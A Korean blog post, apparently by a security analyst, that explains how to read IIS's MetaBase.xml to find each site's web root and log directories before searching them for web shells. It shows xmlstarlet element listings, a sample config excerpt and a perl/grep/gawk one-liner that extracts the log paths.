대부분(99.9%) 서비스중인 시스템에서 원격으로 붙어서 분석을 진행하고 있습니다.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
웹쉘이나 악성스크립트를 찾기 위해 미리 만들어둔 파일을 가지고 grep으로 찾는 방식을 쓰고 있는데요..&lt;br /&gt;
&lt;br /&gt;
모든 사이트들이 웹 폴더나 웹로그 폴더가 다 제각각이다보니 이걸 자동으로 가져올 수 있지 않을까 찾다가&lt;br /&gt;
&lt;br /&gt;
C:\WINDOWS\system32\inetsrc/MetaBase.xml 이라는 파일에 IIS 관련 정보들이 들어 있다는걸 알게되었습니다. 이제서야....-_-;;&lt;br /&gt;
&lt;br /&gt;
해당 파일에 IIS 관련 정보들이 다~ 들어있더군요..&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
구조는 대충 다음과 같습니다.&lt;br /&gt;
&lt;br /&gt;
&lt;img src=&quot;data:image/png;base64,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&quot; alt=&quot;&quot;&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;a title=&quot;[http://www.microsoft.com/korea/technet/iis/adsi2.mspx]로 이동합니다.&quot; target=&quot;_blank&quot; href=&quot;http://www.microsoft.com/korea/technet/iis/adsi2.mspx&quot;&gt;http://www.microsoft.com/korea/technet/iis/adsi2.mspx&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
제가 만들고자 하는 자동화된 스크립트에서 사용할 부분은 IIsWebService, IIsWebServer, IIsWebVirtualdirectories입니다.&lt;br /&gt;
&lt;br /&gt;
여기에 웹 폴더와 웹로그 폴더 정보가 들어있습니다.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
현재 제가 사용하고 있는 2003 서버에서 xmlstarlet이라는 프로그램으로 XML 엘리먼트 구조를 확인해봤고 필요한 부분만 발췌하였습니다.&lt;br /&gt;
&lt;br /&gt;
xmlstarlet : &lt;a title=&quot;[http://xmlstar.sourceforge.net/]로 이동합니다.&quot; target=&quot;_blank&quot; href=&quot;http://xmlstar.sourceforge.net/&quot;&gt;http://xmlstar.sourceforge.net/&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;span style=&quot;font-family: Courier New;&quot;&gt;C:\&amp;gt; xml.exe el -a C:\WINDOWS\system32\inetsrv\MetaBase.xml&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-family: Courier New;&quot;&gt;
...&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-family: Courier New;&quot;&gt;
configuration/MBProperty/IIsWebService&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-family: Courier New;&quot;&gt;
configuration/MBProperty/IIsWebService/@Location&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-family: Courier New;&quot;&gt;
configuration/MBProperty/IIsWebService/@AllowKeepAlive&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-family: Courier New;&quot;&gt;
...&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-family: Courier New;&quot;&gt;
configuration/MBProperty/IIsWebService/@HttpErrors&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-family: Courier New;&quot;&gt;
configuration/MBProperty/IIsWebService/@IIs5IsolationModeEnabled&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-family: Courier New;&quot;&gt;
configuration/MBProperty/IIsWebService/@InProcessIsapiApps&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-family: Courier New;&quot;&gt;
configuration/MBProperty/IIsWebService/@LogExtFileFlags&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;color: rgb(227, 22, 0);&quot;&gt;&lt;span style=&quot;font-family: Courier New;&quot;&gt;configuration/MBProperty/IIsWebService/@LogFileDirectory&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-family: Courier New;&quot;&gt;
configuration/MBProperty/IIsWebService/@LogFilePeriod&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-family: Courier New;&quot;&gt;
configuration/MBProperty/IIsWebService/@LogFileTruncateSize&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-family: Courier New;&quot;&gt;
configuration/MBProperty/IIsWebService/@LogInUTF8&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-family: Courier New;&quot;&gt;
...&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-family: Courier New;&quot;&gt;
configuration/MBProperty/IIsWebService/Custom&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-family: Courier New;&quot;&gt;
configuration/MBProperty/IIsWebService/Custom/@Name&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-family: Courier New;&quot;&gt;
configuration/MBProperty/IIsWebService/Custom/@ID&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-family: Courier New;&quot;&gt;
configuration/MBProperty/IIsWebService/Custom/@Value&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-family: Courier New;&quot;&gt;
...&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-family: Courier New;&quot;&gt;
configuration/MBProperty/IIsWebServer&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-family: Courier New;&quot;&gt;
configuration/MBProperty/IIsWebServer/@Location&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-family: Courier New;&quot;&gt;
configuration/MBProperty/IIsWebServer/@AppPoolId&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-family: Courier New;&quot;&gt;
configuration/MBProperty/IIsWebServer/@DefaultDoc&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;color: rgb(227, 22, 0);&quot;&gt;&lt;span style=&quot;font-family: Courier New;&quot;&gt;configuration/MBProperty/IIsWebServer/@LogFileDirectory&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-family: Courier New;&quot;&gt;
configuration/MBProperty/IIsWebServer/@LogFileLocaltimeRollover&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-family: Courier New;&quot;&gt;
configuration/MBProperty/IIsWebServer/@LogFilePeriod&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-family: Courier New;&quot;&gt;
configuration/MBProperty/IIsWebServer/@LogFileTruncateSize&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-family: Courier New;&quot;&gt;
configuration/MBProperty/IIsWebServer/@LogPluginClsid&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-family: Courier New;&quot;&gt;
configuration/MBProperty/IIsWebServer/@ServerAutoStart&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-family: Courier New;&quot;&gt;
configuration/MBProperty/IIsWebServer/@ServerBindings&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-family: Courier New;&quot;&gt;
configuration/MBProperty/IIsWebServer/@ServerComment&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-family: Courier New;&quot;&gt;
configuration/MBProperty/IIsWebServer/@ServerSize&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-family: Courier New;&quot;&gt;
...&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-family: Courier New;&quot;&gt;
configuration/MBProperty/IIsWebVirtualDir&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-family: Courier New;&quot;&gt;
configuration/MBProperty/IIsWebVirtualDir/@Location&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-family: Courier New;&quot;&gt;
configuration/MBProperty/IIsWebVirtualDir/@AccessFlags&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-family: Courier New;&quot;&gt;
configuration/MBProperty/IIsWebVirtualDir/@AppFriendlyName&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-family: Courier New;&quot;&gt;
configuration/MBProperty/IIsWebVirtualDir/@AppIsolated&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-family: Courier New;&quot;&gt;
configuration/MBProperty/IIsWebVirtualDir/@AppRoot&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-family: Courier New;&quot;&gt;
configuration/MBProperty/IIsWebVirtualDir/@AspAllowSessionState&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-family: Courier New;&quot;&gt;
configuration/MBProperty/IIsWebVirtualDir/@AspEnableParentPaths&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-family: Courier New;&quot;&gt;
configuration/MBProperty/IIsWebVirtualDir/@DefaultDoc&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;color: rgb(227, 22, 0);&quot;&gt;&lt;span style=&quot;font-family: Courier New;&quot;&gt;configuration/MBProperty/IIsWebVirtualDir/@Path&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-family: Courier New;&quot;&gt;
configuration/MBProperty/IIsWebVirtualDir/@ScriptMaps&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-family: Courier New;&quot;&gt;
configuration/MBProperty/IIsWebVirtualDir/@UNCPassword&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-family: Courier New;&quot;&gt;
configuration/MBProperty/IIsWebDirectory&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-family: Courier New;&quot;&gt;
configuration/MBProperty/IIsWebDirectory/@Location&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-family: Courier New;&quot;&gt;
configuration/MBProperty/IIsWebDirectory/@DirBrowseFlags&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-family: Courier New;&quot;&gt;
...&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-family: Courier New;&quot;&gt;
configuration/MBProperty/IIsWebVirtualDir/@AppIsolated&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-family: Courier New;&quot;&gt;
configuration/MBProperty/IIsWebVirtualDir/@AppRoot&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-family: Courier New;&quot;&gt;
configuration/MBProperty/IIsWebVirtualDir/@AuthFlags&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-family: Courier New;&quot;&gt;
configuration/MBProperty/IIsWebVirtualDir/@DirBrowseFlags&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;color: rgb(227, 22, 0);&quot;&gt;&lt;span style=&quot;font-family: Courier New;&quot;&gt;configuration/MBProperty/IIsWebVirtualDir/@Path&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-family: Courier New;&quot;&gt;
...&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
붉은색으로 된 부분이 저에게 필요한 부분입니다.&lt;br /&gt;
&lt;br /&gt;
configuration/MBProperty/IIsWebService/@LogFileDirectory&lt;br /&gt;
configuration/MBProperty/IIsWebServer/@LogFileDirectory&lt;br /&gt;
configuration/MBProperty/IIsWebVirtualDir/@Path&lt;br /&gt;
configuration/MBProperty/IIsWebVirtualDir/@Path&lt;br /&gt;
&lt;br /&gt;
LogFileDirectory 엘리먼트는 각각 IIsWebService와 IIsWebServer에 존재하고 있습니다.&lt;br /&gt;
&lt;br /&gt;
IIsWebService/@LogFileDirectory : IIS 디폴트 설정&lt;br /&gt;
IIsWebServer/@LogFileDirectory : 관리자가 로그디렉토리를 별도로 지정할 경우&lt;br /&gt;
IIsWebVirtualDir/@Path : IIS 홈 디렉토리 경로&lt;br /&gt;
&lt;br /&gt;
IIsWebService는 IIS 서비스 자체에 대한 글로벌한 설정이 있고&lt;br /&gt;
IIsWebServer, IIsWebVirtualDir은 IIS 웹서버가 1개 이상 존재할 경우 각각마다에 대한 설정이 있습니다.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
MetaBase.xml 파일에서 이해를 돕기 위한 부분을 직접 보시겠습니다.&lt;br /&gt;
&lt;br /&gt;
&lt;table style=&quot;border-collapse:collapse&quot; bgcolor=&quot;#ffffff&quot; cellpadding=&quot;1&quot; cellspacing=&quot;1&quot; width=&quot;700&quot;&gt;
&lt;tbody&gt;&lt;tr&gt;
&lt;td style=&quot;border:1px solid #dadada&quot; width=&quot;100%&quot;&gt;&amp;nbsp;&lt;span style=&quot;font-family: Courier New;&quot;&gt;&amp;lt;IIsComputer&amp;nbsp;&amp;nbsp;&amp;nbsp; Location =&quot;/LM&quot;&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;span style=&quot;font-family: Courier New;&quot;&gt;
&amp;lt;IIsWebService&amp;nbsp;&amp;nbsp;&amp;nbsp; Location =&quot;/LM/W3SVC&quot;&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-family: Courier New;&quot;&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;&amp;nbsp; LogFileDirectory=&quot;C:\WINDOWS\system32\LogFiles&quot;&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;span style=&quot;font-family: Courier New;&quot;&gt;
&amp;lt;IIsWebServer&amp;nbsp;&amp;nbsp;&amp;nbsp; Location =&quot;/LM/W3SVC/1&quot;&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-family: Courier New;&quot;&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; LogFileDirectory=&quot;D:\log&quot;&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;span style=&quot;font-family: Courier New;&quot;&gt;
&amp;lt;IIsWebVirtualDir&amp;nbsp;&amp;nbsp;&amp;nbsp; Location =&quot;/LM/W3SVC/1/ROOT&quot;&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-family: Courier New;&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; Path=&quot;C:\Inetpub\wwwroot&quot;&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;span style=&quot;font-family: Courier New;&quot;&gt;
&amp;lt;IIsWebServer&amp;nbsp;&amp;nbsp;&amp;nbsp; Location =&quot;/LM/W3SVC/1798844755&quot;&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-family: Courier New;&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;&amp;nbsp; LogFileDirectory=&quot;C:\WINDOWS\system32\LogFiles&quot;&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;span style=&quot;font-family: Courier New;&quot;&gt;
&amp;lt;IIsWebVirtualDir&amp;nbsp;&amp;nbsp;&amp;nbsp; Location =&quot;/LM/W3SVC/1798844755/root&quot;&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-family: Courier New;&quot;&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;&amp;nbsp; &amp;nbsp; Path=&quot;D:\web&quot;&lt;/span&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;
&lt;br /&gt;
&lt;br /&gt;
스크립트 작성시에는 perl을 이용해서 필요한 부분만 추출해서 점검대상 IIS 서버의 웹 폴더와 웹로드 폴더가 어디인지&lt;br /&gt;
&lt;br /&gt;
확인한 후 해당 폴더 하위에서 웹쉘이든 특이한 웹로그든 뒤지게끔 하면 되겠습니다.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;span style=&quot;font-family: Courier New;&quot;&gt;perl -ne &quot;print if /^&amp;lt;IIsWebServer/../^&amp;lt;\/IIsWebServer/&quot; C:\WINDOWS\system32\inetsrv\MetaBase.xml | grep LogFileDirectory | gawk -F\&quot; &quot;{print $2}&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
그럼 이만 또 삽질하러~ :)&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;&lt;div class=&quot;entry-ccl&quot; style=&quot;clear: both; text-align: right; margin-bottom: 10px&quot;&gt;
	&lt;img id=&quot;ccl-icon-148-0&quot; class=&quot;entry-ccl-by&quot; src=&quot;http://i1.daumcdn.net/cfs.tistory/v/0/static/admin/editor/ccl_black01.png&quot; alt=&quot;저작자 표시&quot;/&gt;
	&lt;img id=&quot;ccl-icon-148-1&quot; class=&quot;entry-ccl-nc&quot; src=&quot;http://i1.daumcdn.net/cfs.tistory/v/0/static/admin/editor/ccl_black02.png&quot; alt=&quot;비영리&quot;/&gt;
